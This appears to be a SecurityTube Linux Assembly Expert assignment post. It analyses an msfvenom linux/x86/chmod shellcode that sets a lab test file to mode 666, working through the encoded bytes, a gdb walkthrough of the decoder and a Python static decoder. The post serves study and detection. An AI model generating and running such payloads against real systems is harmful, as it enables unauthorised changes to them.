- Take up at least 3 shellcode samples created using msfvenom for linux/x86
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
Command to generate shellcode:
msfvenom -p linux/x86/chmod FILE=/home/ptlabmachine/slae-test.txt -b '\x00' -f c
"\xdb\xd5\xba\xa6\x9c\x1b\xf7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x0f\x31\x56\x18\x03\x56\x18\x83\xc6\xa2\x7e\xee\x6e\xc0\x71"
"\x49\xc3\xfc\xaf\x69\xe3\xfc\x80\x01\x8c\x91\xbb\xfe\x22\x1d"
"\x28\x60\xa1\xb0\xd1\x01\x4d\x23\x7c\xa3\xa2\xc0\xec\x4a\xd8"
"\x0b\x99\xe9\x51\x27\x4f\x86\xed\xb3\x8f\x3d\x66\x8d\x91\xc1"
"\x76\xa8\x5c\x41\x1c\x4b\x07\x8f\x61"
File permissions before executing the shellcode:
Testing shellcode with run_shellcode.c
Chmod system call details:
The chmod system call takes two arguments: the path to the file and the mode (the permission bits). On 32-bit Linux it is syscall number 15.
Let’s analyze the shellcode with gdb:
We placed a breakpoint at the code variable, defined a hook-stop and issued the run command:
We have hit our breakpoint and this is the state of CPU registers:
Examining the contents at memory location 0x0804a040 (i.e. where EIP is pointing at present):
We are at the beginning of our shellcode. We step into the code a few times to let the decoder work:
We have entered the decoder loop. Placing a breakpoint at 0x0804a05b (the first instruction after the loop) and continuing execution of the program:
Disassembling 60 bytes from eip. This is our decoded shellcode:
0x0804a05c <code+28>: push 0xf
0x0804a05e <code+30>: pop eax
Store the syscall number 15 (hex 0xf) in eax.
0x0804a05f <code+31>: push edx
0x0804a060 <code+32>: call 0x804a086 <code+70>
0x0804a065 <code+37>: das
0x0804a066 <code+38>: push 0x2f656d6f
0x0804a06b <code+43>: jo 0x804a0e1
0x0804a06d <code+45>: ins BYTE PTR es:[edi],dx
0x0804a06e <code+46>: popa
0x0804a06f <code+47>: bound ebp,QWORD PTR [ebp+0x61]
0x0804a072 <code+50>: arpl WORD PTR [eax+0x69],bp
0x0804a075 <code+53>: outs dx,BYTE PTR ds:[esi]
0x0804a076 <code+54>: gs
0x0804a077 <code+55>: das
0x0804a078 <code+56>: jae 0x804a0e6
0x0804a07a <code+58>: popa
0x0804a07b <code+59>: gs
0x0804a07c <code+60>: sub eax,0x74736574
0x0804a081 <code+65>: cs
0x0804a082 <code+66>: je 0x804a0fc
0x0804a084 <code+68>: je 0x804a086 <code+70>
0x0804a086 <code+70>: pop ebx
The call pushes the address of the file path /home/ptlabmachine/slae-test.txt (the bytes that follow the call instruction) onto the stack, and the pop at the call target moves that address into ebx. Examining the memory at address 0x0804a065:
As can be seen from the above image, the bytes from 0x0804a065 to 0x0804a084 are the hex values of the string ‘/home/ptlabmachine/slae-test.txt’. gdb has simply disassembled these bytes as if they were instructions.
0x0804a087 <code+71>: push 0x1b6
0x0804a08c <code+76>: pop ecx
0x0804a08d <code+77>: int 0x80
These instructions store the mode 0x1b6 (666 in octal) on the stack and pop it into ecx. Finally, the chmod syscall is invoked with the int 0x80 instruction.
0x0804a08f <code+79>: push 0x1
0x0804a091 <code+81>: pop eax
0x0804a092 <code+82>: int 0x80
These instructions execute the exit syscall (syscall number 1).
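The decoder loop stepped through above (xor a dword at [esi+0x18] with edx, add the decoded dword to edx, advance esi, loop 15 times) and the chmod payload layout it produces can both be reproduced statically, without executing anything. The following script is an added example written for this post; it is not part of the assignment repository or of msfvenom. It re-implements the decoder from the stub bytes (key in the mov edx, count in the mov cl, displacement in the xor), and then walks the decoded payload to recover the syscall number, the path and the mode the way the gdb session did. The stub layout it checks for is taken from the bytes in the C string above; the names parse_decoder_stub, decode and summarise_chmod_payload are this example's own.

```python
"""Static decode of the msfvenom linux/x86/chmod shellcode analysed in this post."""
import struct

# Constructed from the C string in the post: the 84-byte encoded shellcode.
SHELLCODE = bytes.fromhex(
    "dbd5baa69c1bf7d97424f45e2bc9b1"
    "0f31561803561883c6a27eee6ec071"
    "49c3fcaf69e3fc80018c91bbfe221d"
    "2860a1b0d1014d237ca3a2c0ec4ad8"
    "0b99e951274f86edb38f3d668d91c1"
    "76a85c411c4b078f61"
)


def parse_decoder_stub(sc):
    """Pull key, dword count and start offset out of the decoder stub.

    Stub as it appears in the shellcode (bytes -> instruction):
      db d5        fcmovnu st(0),st(5)   ; any FPU instruction, only sets FIP
      ba <imm32>   mov edx, <key>
      d9 74 24 f4  fnstenv [esp-0xc]     ; FIP (address of fcmovnu) lands at [esp]
      5e           pop esi               ; esi = start of the shellcode
      2b c9        sub ecx, ecx
      b1 <imm8>    mov cl, <number of dwords to decode>
      31 56 18     xor [esi+0x18], edx   ; decode one dword in place
      03 56 18     add edx, [esi+0x18]   ; key += decoded dword
      83 c6 ..     add esi, 4            ; last byte is itself encoded
      e2 ..        loop                  ; back to the xor (encoded)
    """
    if sc[2] != 0xBA or sc[7:12] != b"\xd9\x74\x24\xf4\x5e":
        raise ValueError("unexpected decoder stub layout")
    key = struct.unpack_from("<I", sc, 3)[0]
    if sc[12:15] != b"\x2b\xc9\xb1":
        raise ValueError("expected sub ecx,ecx / mov cl,imm8")
    count = sc[15]
    if sc[16:18] != b"\x31\x56":
        raise ValueError("expected xor [esi+disp8],edx")
    offset = sc[18]  # disp8 of the xor: first dword decoded sits at esi+offset
    return key, count, offset


def decode(sc, key, count, offset):
    """Emulate the loop: xor each dword with the running key, then key += dword."""
    buf = bytearray(sc)
    for i in range(count):
        pos = offset + 4 * i
        enc = struct.unpack_from("<I", buf, pos)[0]
        dec = enc ^ key
        struct.pack_into("<I", buf, pos, dec)
        key = (key + dec) & 0xFFFFFFFF
    return bytes(buf)


def summarise_chmod_payload(decoded, start):
    """Recover syscall number, path and mode from the decoded chmod payload.

    Layout (as in the gdb listing): push 0xf / pop eax / push edx /
    call <past the string> / "<path>\\0" / pop ebx / push <mode> / pop ecx / int 0x80
    """
    i = decoded.index(b"\x6a\x0f\x58\x52\xe8", start)
    syscall = decoded[i + 1]                       # imm8 of push 0xf
    rel = struct.unpack_from("<i", decoded, i + 5)[0]
    path_start = i + 9                             # byte right after the call
    path_end = decoded.index(b"\x00", path_start)  # NUL terminator of the path
    path = decoded[path_start:path_end].decode()
    target = i + 9 + rel                           # call target: pop ebx
    if decoded[target] != 0x5B or decoded[target + 1] != 0x68:
        raise ValueError("expected pop ebx / push imm32 at call target")
    mode = struct.unpack_from("<I", decoded, target + 2)[0]
    return {"syscall": syscall, "path": path, "mode": mode}


if __name__ == "__main__":
    key, count, offset = parse_decoder_stub(SHELLCODE)
    print(f"key=0x{key:08x} dwords={count} decoding starts at offset 0x{offset:x}")
    dec = decode(SHELLCODE, key, count, offset)
    print("decoded payload:", dec[offset:].hex())
    info = summarise_chmod_payload(dec, offset)
    print(f"chmod (syscall {info['syscall']}) {info['path']} mode {info['mode']:o}")
```

The first four decoded bytes are the tail of `add esi,4` and the `loop` instruction themselves (04 e2 f5), which is why the decoder has to run in place: the loop's own bytes are encoded. From a detection standpoint the decoded region, not the encoded bytes, is what is worth matching on; the encoder picks a fresh key on every msfvenom run, so the bytes in the C string differ each time while the path, the mode 0x1b6 and the `push 0xf / pop eax ... int 0x80` skeleton stay the same.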
The libemu graph for this shellcode is:
Github repository for this assignment: Assignment 5/5-1
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-897
Uday Mittal (OSCP, Associate CISSP, DCPP) is the founder of Yaksas CSC. He has over 4 years of experience in dealing with various issues related to cyber security. He is actively working towards educating people on cyber security risks and steps to mitigate them. He’s also a member of (ISC)2, ISACA and DSCI.